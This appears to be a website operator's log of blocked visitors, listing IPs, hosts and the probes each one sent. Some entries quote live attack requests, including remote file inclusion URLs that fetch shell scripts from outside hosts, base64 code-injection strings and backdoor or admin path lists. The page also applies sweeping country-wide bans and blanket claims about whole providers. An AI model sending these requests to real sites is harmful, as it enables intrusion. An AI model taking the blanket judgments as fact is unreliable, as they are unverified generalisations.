/user/register?zjixallipatw=lpgwunznm
108.59.252.94 Hostname: vps-1064591-4964.manage.myhosting.com
Company: United States – Pittsford Softcom America Inc.
Shared hosting server IP: 5 websites
Hacker looking for vulnerabilities
//wp-content/uploads/images.php
//wp-includes/jahat.php
/%E2%80%A6ordpress-website//thumb_editor.php
//wp-includes/class-wp-customize-client.php
//wp-includes/wp-services.php
//wp-includes/wp-script.php
/%E2%80%A6ordpress-website//x.txt
/%E2%80%A6ordpress-website//c.txt
/%E2%80%A6ordpress-website//logx.txt
66.55.72.82 Hostname: cloud.mtbmedia.com
Company: United States – Atlanta Skiplink Llc
Shared hosting server IP: 16 websites
Hacker looking for vulnerabilities
//wp-content/uploads/images.php
//wp-includes/jahat.php
//thumb_editor.php
//wp-includes/class-wp-customize-client.php
//wp-includes/wp-services.php
//wp-includes/wp-script.php
//x.txt
//c.txt
//logx.tx
69.197.189.18 Company: United States – Kansas City Wholesale Internet Inc. Brute Force register attack on restricted site with typical hacker URLs
/ucp.php?change_lang=en&mode=register
/profile.php?mode=register&agreed=true&coppa=0
/registration_rules.asp?FID=0
/?option=com_registration&task=register
/index.php?option=com_registration&task=register
/index.php?action=registernew
/index.php?page=en_Signup
/?page=login&cmd=register
/register.php
85.107.214.136 Hostname: 85.107.214.136.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
WordPress login attempt
85.107.0.0 – 85.107.255.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted Region:
Bad host: Ankara Turk Telekomunikasyon Anonim Sirketi
99% of IPs from this company used for spamming and dictionary attacks
193.234.166.161 Company: Sweden – Stockholm Proxy Services Forbidden method: GET
66.248.194.163 Company: United States – Dallas Marcus Bergman Spammer
Trying to login with user name aiyverona
Trying to add content: /node/add
94.181.186.196 Hostname: dynamicip-94-181-186-196.pppoe.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment spammer
94.181.184.0 – 94.181.191.255 Company: Russian Federation – Penza Cjsc Er-telecom Holding Banned region: Russian Federation
Bad host: Penza Cjsc Er-telecom Holding
95.79.106.71 Hostname: dynamicip-95-79-106-71.pppoe.nn.ertelecom.ru
Company: Russian Federation – Nizhniy Novgorod Cjsc Er-telecom Holding
Comment spammer
95.79.104.0 – 95.79.111.255 Company: Russian Federation – Nizhniy Novgorod Cjsc Er-telecom Holding Banned region: Russian Federation
88.227.94.114 Hostname: 88.227.94.114.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Multiple attempts to login to WordPress
/wp-login.php
88.227.93.145 – 88.227.95.82 Turkey Restricted region: Turkey
65.55.24.234 Hostname: msnbot-65-55-24-234.search.msn.com
Company: United States – Redmond Microsoft Corp
Rule breaker, Bad bot and possible spambot
Triggered PHP warnings in Drupal
Cannot change zlib.output_compression – headers already sent in drupal_serve_page_from_cache
() (line 1353 of /home/*******/public_html/includes/bootstrap.inc).
Cannot modify header information – headers already sent by (output started at /home/*******
/public_html/includes/bootstrap.inc:1364) in drupal_send_headers() (line 1216 of /home/*******/
public_html/includes/bootstrap.inc).
The bot looked for a non-existent comment form DOMAIN/comment/184
Rule breaker – /comment/ is specifically disallowed in robots.txt.
23.29.56.249 Hostname: 23-29-56-249.5280enterprises.com
Company: United States – Ashburn 5280 Enterprises Llc
Comment Spammer
198.50.215.34 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Bad host: Ovh Hosting Inc.
199.59.57.191 see next Hostname: smtp2.clixtrackr.com
Company: United States – Tulsa Private Customer
Tried to register on restricted site
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
199.59.56.0 – 199.59.63.255 Company: United States – Tulsa Private Customer Bad host: Tulsa Private Customer
Very high percentage of IPs registered to Tulsa Private Customer have bad honeypot reports
193.34.172.62 see next Hostname: 62-172.users.icservice.net.ua
Company: Ukraine – Podvinogradov Pe Infocomservice
Looking for WordPress plugins with known vulnerabilities.
Looking for readme.txt files for these plugins
193.34.172.0 – 193.34.173.255 Region: Ukraine Banned region: Ukraine
This IP range is extremely high risk and should be banned
216.59.32.115 Hostname: us55.toservers.com
Company: Argentina – Buenos Aires Virtucom Network Sa
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
142.54.181.180 Company: United States – Kansas City Zhao Lee Comment Spammer
198.2.208.34 see next Company: United States – PEG TECH INC Comment Spammer
198.2.192.0 – 198.2.255.255 Company: United States – PEG TECH INC Bad host: PEG TECH INC
142.4.112.217 see next Company: United States – San Jose Wang He
PEG TECH INC
Comment Spammer
142.4.112.208 – 142.4.112.223 Company: United States – San Jose Wang He
PEG TECH INC
Bad host: PEG TECH INC
198.27.66.119 Hostname: ns4005155.ip-198-27-66.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
41.133.175.235 Hostname: 41-133-175-235.dsl.mweb.co.za
Company: South Africa – Cape Town Mweb Connect (proprietary) Limited
Mail server / Dictionary attacker
115.115.85.42
115.115.84.216
115.115.84.214
115.115.84.205
115.115.84.196
115.115.84.194
115.115.84.130
Company: India – Mumbai Internet Service Provider Spammer and/or dictionary attacker
69.197.189.57 Company: United States – Kansas City Wholesale Internet Inc. Trying to register on restricted site
/user/register
/tiki-register.php
208.110.71.50 Hostname: lostyourmind.info
Company: United States – Evanston Pure Pulse Media Llc
Trying to register on restricted site
/user/register
/tiki-register.php
206.159.120.95 Hostname: mdimail5.midwestdatainc.com
Company: United States – Lawrenceburg Midwest Data Inc
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
75.126.150.2 Hostname: emedia.e-mediaresources.com
Company: United States – Dallas Al Host.net
Shared hosting server IP
Hacker looking for WordPress scripts
//wp-includes/wp-services.php
//x.txt
//wp-includes/jahat.php
//wp-includes/class-wp-customize-client.php
//thumb_editor.php
//logx.txt
//c.txt
199.119.180.151 Hostname: mhsecure.serverpowered.net
Company: United States – Orlando Infinitum Technologies Inc.
Website server IP: websites – mhsecure.com, stubuchalter-photos.com
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Flexible/timthumb.php?src=http: //flickr.com.golfpops.com/r57.php
94.242.255.142 Hostname: ip-static-94-242-255-142.as5577.net
Company: Luxembourg – Steinsel Root Sa
Comment Spammer
74.221.222.136 Company: United States – Seattle Dme Hosting Llc Comment Spammer
198.50.136.237 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Bad host
Banned user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
192.119.144.207 Company: United States – Dallas Patrick Song Comment Spammer
Banned user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
91.224.160.25 see next Company: Netherlands – Amsterdam Bergdorf Group Ltd. Tried to access phpMyAdmin / mySQL and other server admin
/pma/index.php
/phpMyAdmin/index.php
/PMA/index.php
/dbadmin/index.php
/mysql/index.php
/myadmin/index.php
/php-my-admin/index.php
/sqlmanager/index.php
/mysqlmanager/index.php
/phpmanager/index.php
/webadmin/index.php
/sqlweb/index.php
/websql/index.php
/webdb/index.php
/mysqladmin/index.php
/mysql-admin/index.php
/php-myadmin/index.php
/phpmy-admin/index.php
91.224.160.0 – 91.224.161.255 Company: Netherlands – Amsterdam Bergdorf Group Ltd. Bad Host: Bergdorf Group
95.28.236.220 see next Hostname: 95-28-236-220.broadband.corbina.ru
Company: Russian Federation – Moscow Dynamic Ip Pool For Broadband Customers
Comment Spammer
95.24.0.0 – 95.30.255.255 Company: Russian Federation – Moscow Dynamic Ip Pool For Broadband Customers Banned region: Russian Federation
188.165.251.128 Hostname: ns380613.ovh.net
Company: France – Roubaix Ovh Systems
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Quadro/timthumb.php?src=http: //picasa.com.transform-magazine.net/bat.php
168.144.48.134 Hostname: vps-1129352-15800.manage.myhosting.com
Company: Canada – Toronto Softcom Technology Consulting Inc.
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/circled/scripts/timthumb.php?src=http: //flickr.com.amcrecordsinc.com/cp
/wp-content/themes/circled/scripts/timthumb.php?src=http: //flickr.com.amcrecordsinc.com/shellx.php
82.141.148.102 see next Hostname: mail.mbrt.hu
Company: Hungary – Budapest Ptc-adsl-pool Countrywide
Brute force hacking attack – more than 400 hits in 9 minutes looking for e.g.
/includes/admin_board2.php?phpbb_root_path=data://text/plain;base64,
U0hFTExfTU9KTk9fUFJPQk9WQVRK?ls/includes/admin_board2.php?phpbb_root_path=
1’+–+?ls/system/includes/pageheaderdefault.inc.php?_sysSessionPath=1’+–+
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=data://text/
plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK/system/admin/include/upload_form.php
?GLOBALS=1’+–+/system/admin/include/upload_form.php?GLOBALS=data://
text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK
TOO MANY TO LIST
82.141.148.0 – 82.141.148.255 Company: Hungary – Budapest Ptc-adsl-pool Countrywide Banned region: Hungary
Bad host
198.245.49.185 Hostname: ks4001081.ip-198-245-49.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
Bad host: Ovh Hosting Inc
83.142.226.78 Company: United Kingdom Glasgow Iomart Hosting Limited
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/circled/scripts/timthumb.php?src=http %3A%2F%2Fflickr.com.3dkraloyun.com
/wp-content/themes/circled/scripts/timthumb.php?src=http %3A%2F%2Fflickr.com.3dkraloyun.com
%2Fbad.php
URL/&sa=U&ei=gdqoUfPYF6OKjALv54GgDA&ved=0CI8CEBYwSThk&usg=
AFQjCNGJz4ZuISZ14yLl9czhG-o0URZXEA/wp-content/themes/circled/scripts/timthumb.php
173.208.187.253 Hostname: vps2.confidentialemails.net
Company: United States – Kansas City Gold Vip Club
Website server IP: website – traderinweb.com
Comment Spammer
142.4.113.105 Company: United States – San Jose Vpsbus
PEG TECH INC
Website server IP: junk websites – sfbwg.cn szhomi.com
Comment Spammer
142.4.113.104 – 142.4.113.111 Company: United States – San Jose Vpsbus
PEG TECH INC
Bad host
87.98.243.134 see next Company: France – Roubaix Ovh Systems Tried to register on restricted site
61.38.186.148 Company: Korea, Republic Of – Seoul Dacom Corp. Comment Spammer
188.134.38.199 Company: Russian Federation – Saint Petersburg Perspectiva Ltd. Looking for scripts:
/wp-login.phpindex.php
188.134.0.0 – 188.134.63.255 Company: Russian Federation – Saint Petersburg Perspectiva Ltd. Banned region: Russian Federation
100.42.213.31 Hostname: 100-42-213-31.static.webnx.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
91.121.210.184 see next Hostname: ks364740.kimsufi.com
Company: France – Roubaix Ovh Systems
Website server IP: junk websites – ajaccio-immobilier.com – cupabia.com
Multiple attempts to register
/user/register
/join
87.205.177.71 Hostname: 87-205-177-71.adsl.inetia.pl
Company: Poland – Warsaw Netia Sa
Tried to register on restricted site
Mail server
198.171.171.102 Hostname: pureluxu.securesites.net
Company: United States – Englewood Ntt America Inc.
Shared hosting server IP: 14 websites
Bad requests
URL/&sa=U&ei=3P2qUdWwCuOv4AT504GwDQ&ved=0CEgQFjAP&usg=
AFQjCNHy4A8SkDco3WGmMa6QXF54-aLuHw/index.php
URL/index.php
91.121.202.98 see next Hostname: ks3094130.kimsufi.com
Company: France – Roubaix Ovh Systems
Comment Spammer
Bad host: Roubaix Ovh Systems
37.59.71.177 Hostname: ks3094130.kimsufi.com
Company: France – Roubaix Ovh Systems
Comment Spammer
Bad host: Roubaix Ovh Systems
188.143.232.133 see next Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Looking for index.php in directories
188.143.232.0 – 188.143.232.255 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Banned region: Russian Federation
190.239.205.29 Company: Peru – Lima Tdperx6 Lacnic Tried to access site admin
/admin.php
190.239.204.60 – 190.239.205.252 98% of IPs in this range have bad reports (spammers / dictionary attackers) on Project Honeypot
89.35.222.229 Hostname: mail.xdigital.ro
Company: Romania – Timisoara Goodnet Srl
Shared hosting server IP: 12 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
89.35.216.0 – 89.35.223.255 Company: Romania – Timisoara Goodnet Srl Restricted region: Romania
190.183.221.108 Hostname: dedicado.bluscai.com
Company: Argentina – Buenos Aires Wnpower.com
Shared hosting server IP: 109 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
93.186.196.151 Hostname: k151.khaki.fastwebserver.de
Company: Germany – Dusseldorf Fast It Colocation/khaki Line
Shared hosting server IP: 34 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/reestate/timthumb.php?src=http: //flickr.com.amcrecordsinc.com/cpx.php
/wp-content/themes/reestate/timthumb.php?src=http: //flickr.com.amcrecordsinc.com/shellx.php
93.182.130.27 Hostname: anon-130-27.relakks.com
Company: Sweden – Lund Viaeuropa I Lund Ab
Comment Spammer
93.182.130.0 – 93.182.131.255 Company: Sweden – Lund Viaeuropa I Lund Ab Bad host
107.23.46.183 Hostname: ec2-107-23-46-183.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Looking for exploit:
//wp-includes/jahat.php
//wp-includes/wp-services.php
//thumb_editor.php
//c.txt
//wp-includes/class-wp-customize-client.php
/wp-content/uploads/images.php
/wp-includes/class-wp-customize-client.php
69.12.247.174 Hostname: 69-12-247-174.dedicated.static.sonic.net
Company: United States – San Francisco Sonic.net Inc.
Looking for exploit:
/includes/functions.inc.php?sitepath=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK
198.50.139.51
198.50.209.152
Company: United States – Newark Ovh Comment Spammer
198.200.37.83 see next Company: China – Hangzhou Jack King Comment Spammer
198.200.32.0 – 198.200.63.255 Company: China – Hangzhou Jack King Banned region: China
158.181.205.210 Company: Kyrgyzstan – Bishkek Mega-line Ltd. Looking for non-existent URLs based on text content (Not a link)
158.181.128.0 – 158.181.255.255 Company: Kyrgyzstan – Bishkek Mega-line Ltd. Restricted region: Kyrgyzstan
Single violation sufficient to ban host
74.208.127.96 Hostname: u15370069.onlinehome-server.com
Company: United States – Wayne 1&1 Internet Inc.
Shared hosting server IP
Hacker looking for vulnerabilities:
/Basic8.php?c_id=ZWNobygidDc0Mzk4MTIiKTs=
74.52.124.82 Hostname: typhoon.websitewelcome.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
Hacker looking for vulnerabilities:
/appserv/lang-english.bak.php?c_id=ZWNobygidDc0Mzk4MTIiKTs=
50.117.46.169 Company: United States – San Jose 5280 Enterprises Llc Comment Spammer
Banned User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
80.93.217.38 see next Hostname: static-80-93-217-38.fibersunucu.com.tr
Company: Turkey – Istanbul Fibersunucu Internet Hizmetleri Ugur Pala
Comment Spammer
80.93.217.32 – 80.93.217.47 Company: Turkey – Istanbul Fibersunucu Internet Hizmetleri Ugur Pala Restricted region: Turkey
Bad host
192.74.237.182 see next Company: United States – San Jose Qingfeng
PEG TECH INC
Comment Spammer
192.74.237.176 – 192.74.237.191 Company: United States – San Jose Qingfeng
PEG TECH INC
Bad host: PEG TECH INC
94.242.237.127 Hostname: hosted-by.buyurl.net
Company: Luxembourg – Steinsel Root Sa
Comment Spammer
88.230.190.88 see next Hostname: 88.230.190.88.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Tried to login to WordPress admin
88.230.0.0 – 88.230.255.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted region: Turkey
Bad host
125.136.130.16 Company: Korea, Republic Of – Seoul Korea Telecom
Shared hosting server IP: website – gvovideo.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
89.221.250.11 Hostname: www11.aname.net
Company: Sweden – Helsingborg Fsd Internet Tjanster Ab
Shared hosting server IP
Bad request
URL /%22%20onmousedown=%22return%20rwt(this,\’\’,\’\’,\’\’,\’63\’,\’AFQjCNFaNNZ-
Bo_FzyNQ8t7x0ZxmO36Fxg\’,\’\’,\’0CKkDEBYwPg\’,\’\’,\’\’,event%22%3EEasy%20Columns%20Plugin%20for%20WordPress%20-%20User%20Guide%20
Review%20and%20Rating%3C/a%3E%3C/h3%3E%3Cdiv%20class=%22s%22%3E%3Cdiv
%3E%3Cdiv%20class=%22thb%20th%22%20style=%22height:44px;width:44px%22%3E%
3Ca%20href=%22/search
173.192.235.226 Hostname: 173.192.235.226-static.reverse.softlayer.com
Company: United States – Chicago Softlayer Technologies Inc.
Rule breaker / Bad bot
SiteExplorer/1.0
173.192.34.95 Hostname: 173.192.34.95-static.reverse.softlayer.com
Company: United States – Dallas Hosting Services Inc.
Rule breaker / Bad bot
Aboundex/0.2 (http: //www.aboundex.com/crawler/)
Aboundex/0.3 (http: //www.aboundex.com/crawler/)
Part of the SiteExplorer/1.0 hacker network
82.94.214.64 Hostname: gw.c1.byte.nl
Company: Netherlands – Amsterdam Byte Internetdiensten
looking for non-existent scripts
/magento/js/mage/cookies.js
/js/mage/cookies.js
71.40.108.83 Hostname: 83.108.40.71.gvodatacenter.com
Company: United States – Schertz Road Runner Holdco Llc
Website server IP: website – gvovideo.com
hacker looking for non-existent files
/st/admin/rotator.php
198.23.48.156 Hostname: hosted.by.liquidnetlimited.com
Company: United States – Pompano Beach Liquidnet Us Llc
Shared hosting server IP
spammer looking for non-existent files
/comments/script.php
173.254.69.161 Hostname: 173-254-69-161.unifiedlayer.com
Company: United States – Provo Unified Layer
Shared hosting server IP
hacker looking for non-existent files
/admin/xmpl.php
216.59.18.115 Hostname: static-ip-115-18-59-216.host.cybernet.co.id
Company: United States – Carol Stream Cachednet Llc
Tried to login with username: jason9166.
Tried to add content: /node/add
93.186.180.126 Hostname: daweb18.oxilion.nl
Company: Netherlands – Enschede Oxilion B.v.
Shared hosting server IP
looking for non-existent files
/page/log.php
50.97.104.67 Hostname: senku.websitewelcome.com
Company: United States – Los Angeles Softlayer Technologies Inc.
Shared hosting server IP
looking for non-existent files
/feed/ftp.php
66.147.244.179 Hostname: box679.bluehost.com
Company: United States – Provo Unified Layer
Shared hosting server IP
looking for non-existent scripts
/cgi-bin/b.php
184.173.232.43 Hostname: gator1541.hostgator.com
Company: United States – Los Angeles Theplanet.com Internet Services Inc.
Shared hosting server IP
looking for non-existent files
/newposts/ftp.php
88.190.253.52 Hostname: f5-sd32.online.net
Company: France – Paris Free Sas
looking for non-existent files
/page/ftp.php
50.23.201.229 Hostname: r6-dallas.webserversystems.com
Company: United States – Denver World Wide Web Hosting Llc
Shared hosting server IP
looking for non-existent files
/index/7/1.php
Known dictionary attacker and bad web host
173.254.52.24 Hostname: 173-254-52-24.unifiedlayer.com
Company: United States – Provo Unified Layer
Shared hosting server IP
looking for non-existent files
/page/img.php
173.254.28.133 Hostname: just133.justhost.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
looking for non-existent files
/index/5/1.php
74.53.227.162 Hostname: sienna.websitewelcome.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
looking for non-existent files
/forum/ftp.php
74.220.207.127 Hostname: host127.hostmonster.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
looking for non-existent files
/wp-content/themes/ftp.php
74.53.27.146 Hostname: frontier.websitewelcome.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
hacker looking for non-existent files
/plugins/system/dvmessages/dvmessages.php?c_id=ZWNobygidDc0Mzk4MTIiKTs=
184.173.232.3 Hostname: gator1526.hostgator.com
Company: United States – Los Angeles Theplanet.com Internet Services Inc.
Shared hosting server IP
hacker looking for non-existent files
/plugins/system/dvmessages.php
37.59.91.151 see next Company: France – Roubaix Ovh Systems Tried to register on WordPress site
201.185.29.82 Hostname: adsl-201-185-29-82.une.net.co
Company: Colombia – Medellin Epm Telecomunicaciones S.a. E.s.p.
Trying to login to WordPress
195.174.147.12 see next Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Trying to login to WordPress
195.174.128.0 – 195.174.159.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted region: Turkey
Bad host
121.111.68.61 Hostname: KD121111068061.ppp-bb.dion.ne.jp
Company: Japan – Tokyo Dion
Trying to login to WordPress
190.233.29.142 Company: Peru – Lima Tdperx21 Lacnic Trying to login to WordPress
190.237.242.239 Company: Peru – Lima Tdp Grs Trying to login to WordPress
190.119.77.237 Company: Peru – Lima America Movil Peru S.a.c. Trying to login to WordPress
190.119.77.237
190.119.84.43
Company: Peru – Lima America Movil Peru S.a.c. Trying to login to WordPress
190.255.245.44 Company: Colombia – Bogota Colombia Telecomunicaciones S.a. Esp Trying to login to WordPress
181.64.158.188 Company: Peru – Lima Tdperx4 Lacnic Trying to login to WordPress
201.172.3.88 Hostname: CableLink3-88.telefonia.InterCable.net
Company: Mexico – Monterrey Television Internacional S.a. De C.v.
Trying to login to WordPress
201.240.231.176 Company: Peru – Lima Tdperx21 Lacnic Trying to login to WordPress
190.129.4.253 Company: Bolivia, Plurinational State Of – Oruro Entel S.a. – Entelnet Trying to login to WordPress
190.237.42.29 Company: Peru – Lima Tdp Grs Trying to login to WordPress
190.43.28.26 Company: Peru – Lima Tdperx3 Lacnic Trying to login to WordPress
190.253.153.175 Company: Colombia – Bogota Colombia Telecomunicaciones S.a. Esp Trying to login to WordPress
46.196.90.241 Company: Turkey – Izmir Turksat Uydu Haberlesme Ve Kablo Tv Isletme A.s. Trying to login to WordPress
190.237.162.109 Company: Peru – Lima Tdp Grs Trying to login to WordPress
126.86.242.79 Hostname: softbank126086242079.bbtec.net
Company: Japan – Tokyo Japan Nation-wide Network Of Softbank Bb Corp.
Trying to login to WordPress
137.186.53.61 Hostname: d137-186-53-61.abhsia.telus.net
Company: Canada – Burnaby Telus Communications Inc.
Trying to login to WordPress
190.131.172.77 Hostname: host-190-131-172-77.ecutel.net.ec
Company: Ecuador – Quito Ecuadortelecom S.a.
Trying to login to WordPress
190.234.94.119 Company: Peru – Lima Tdp Grs Trying to login to WordPress
85.96.200.192 see next Hostname: 85.96.200.192.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Trying to login to WordPress
85.96.199.0 – 85.96.202.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted region: Turkey
Bad host
181.130.198.124 Hostname: cable-181-130-198-124.une.net.co
Company: Colombia – Cota Epm Telecomunicaciones S.a. E.s.p.
Trying to login to WordPress
187.202.212.49 Hostname: dsl-187-202-212-49-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Uninet S.a. De C.v.
Trying to login to WordPress
121.97.239.197 Hostname: 121.97.239.197.BTI.NET.PH
Company: Philippines – Legaspi Bayantel Broadband Dsl – Netbasic_netpersonal_netprivate
Trying to login to WordPress
189.152.156.4 Hostname: dsl-189-152-156-4-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Gestion De Direccionamiento Uninet
Trying to login to WordPress
190.12.51.160 Hostname: corp-190-12-51-160-uio.puntonet.ec
Company: Ecuador – Quito Puntonet S.a.
Trying to login to WordPress
95.81.119.208 see next Company: Iran, Islamic Republic Of – Tabriz Hamara System Tabriz Engineering Company Trying to login to WordPress
95.81.64.0 – 95.81.127.255 Company: Iran, Islamic Republic Of – Tabriz Hamara System Tabriz Engineering Company Restricted region: Iran
190.95.199.155 Hostname: host-190-95-199-155.telconet.net
Company: Ecuador – Guayaquil Clientes Jipijapa
Trying to login to WordPress
190.242.110.38 Company: Colombia – Bogota Columbus Networks Colombia Trying to login to WordPress
187.209.42.251 Hostname: dsl-187-209-42-251-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Uninet S.a. De C.v.
Trying to login to WordPress
173.254.73.102 Hostname: 173-254-73-102.unifiedlayer.com
Company: United States – Provo Unified Layer
Shared hosting server IP
Trying to exploit Drupal
/modules/mod_system/mod_system.php
198.2.200.13 Company: United States – PEG TECH INC Comment Spammer
Bad host: PEG TECH INC
85.119.152.84 Company: Germany – Koeln Vanager Gmbh
Shared hosting server IP
Comment Spammer
198.2.204.73 Company: United States – PEG TECH INC Comment Spammer
Bad host
66.96.183.11 Hostname: 11.183.96.66.static.eigbox.net
Company: United States – The Endurance International Group Inc.
Looking for WSO2 Framework files:
modules/wso2.php
87.98.217.198 see next Hostname: ns22101.ovh.net
Company: France – Paris Ovh Systems
Website server IP: website – weblinkcapital.com
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/premiumnews/thumb.php?src=http: //img.youtube.communication.
adrianaraya.cr/wp-login.php
87.98.216.0 – 87.98.223.255 Company: France – Paris Ovh Systems Bad host: Paris Ovh Systems
94.45.172.107 see next Hostname: dialin.customers.u-l.ru
Company: Russian Federation – Moscow Unionline Ltd.
Comment Spammer
94.45.160.0 – 94.45.191.255 Company: Russian Federation – Moscow Unionline Ltd. Banned Region: Russian Federation
190.201.202.118 Hostname: 190-201-202-118.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Comment Spammer
193.164.207.71 Company: United Kingdom – Nottingham Compuweb Communications Services Limited
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
216.18.208.61 Hostname: mx0.rockvillefloors.com
Company: United States – Los Angeles Webnx Inc.
Website server IP: Junk website – rrr166.com
Comment Spammer
199.204.45.120 Hostname: node-1jfpzzs.cloud9.ymq1.ca.layeredge.net
Company: Canada – Montreal Vexxhost
Comment Spammer
198.57.226.249 Hostname: int.internetpalacehotel.com.br
Company: United States – Provo Unified Layer
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
wp-content/themes/Basic/timthumb.php?src=http: //flickr.com.noviaschile.cl/cpx.php
201.141.109.125 see next Company: Mexico – Mexico City Cablevision S.a. De C.v Trying to login to WordPress
201.141.108.156 – 201.141.110.93 Mexico Bad activity recorded in Project Honeypot
216.10.222.133 Company: Jamaica – Kingston Columbus Communications Jamaica Limited Trying to login to WordPress
89.172.20.221 see next Hostname: 89-172-20-221.adsl.net.t-com.hr
Company: Croatia – Zagreb T-com Croatia
Trying to login to WordPress
89.172.0.0 – 89.172.31.255 Company: Croatia – Zagreb T-com Croatia Restricted region: Croatia
89.218.32.187 see next Company: Kazakhstan – Almaty Sanatorium Almaty Joint-stock Company Trying to login to WordPress
89.218.32.184 – 89.218.32.191 Company: Kazakhstan – Almaty Sanatorium Almaty Joint-stock Company Restricted region: Kazakhstan
37.218.147.51 see next Company: Kyrgyzstan – Bishkek Ojsc Kyrgyztelecom Trying to login to WordPress
37.218.128.0 – 37.218.159.255 Company: Kyrgyzstan – Bishkek Ojsc Kyrgyztelecom Restricted region: Kyrgyzstan
81.232.156.3 Hostname: 81-232-156-3-no238.tbcn.telia.com
Company: Sweden – Stockholm Telia Network Services
Trying to login to WordPress
187.206.199.82 Hostname: dsl-187-206-199-82-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Uninet S.a. De C.v.
Trying to login to WordPress
69.65.42.235 Hostname: ip-69.65.42.235.servernap.net
Company: United States – Arlington Heights Gigenet
Hacker activity: Looking for admin access to site:
/streamrotator/admin.php
/sr/admin.php
/admin/admin.php
/administrator/admin.php
/adminsr/admin.php
/admin_sr/admin.php
sradmin/admin.php
168.144.170.106 Hostname: mejorhospedaje.net
Company: Canada – Toronto Softcom Technology Consulting Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.151.145.28 see next Company: United States – Kansas City Zhou Pizhong
Website server IP: Junk websites – fakeoksunglassespub.net frsaclongchamp1948.net okfakeoakleys.us
Trackback Spammer
Bad host
192.151.145.24 – 192.151.145.31 Company: United States – Kansas City Zhou Pizhong Bad host
87.242.64.32 see next Hostname: gen22.hs.shared.masterhost.ru
Company: Russian Federation – Moscow .masterhost
Looking for non-existent or restricted files
log.php
doc.php
87.242.64.0 – 87.242.64.255 Company: Russian Federation – Moscow .masterhost Banned Region: Russian Federation
Bad host
87.242.32.0 – 87.242.63.255 Company: Hungary – Miskolc Pr-telecom Rt. Restricted Region: Hungary
Bad host
173.254.28.102 Hostname: just102.justhost.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
Looking for .php files
91.232.96.3 see next Company: Germany – Nuremberg Xirra Gmbh Comment Spammer
91.232.96.2 – 91.232.96.40 Company: Germany – Nuremberg Xirra Gmbh Nearly all listed in Project Honeypot as comment spammers
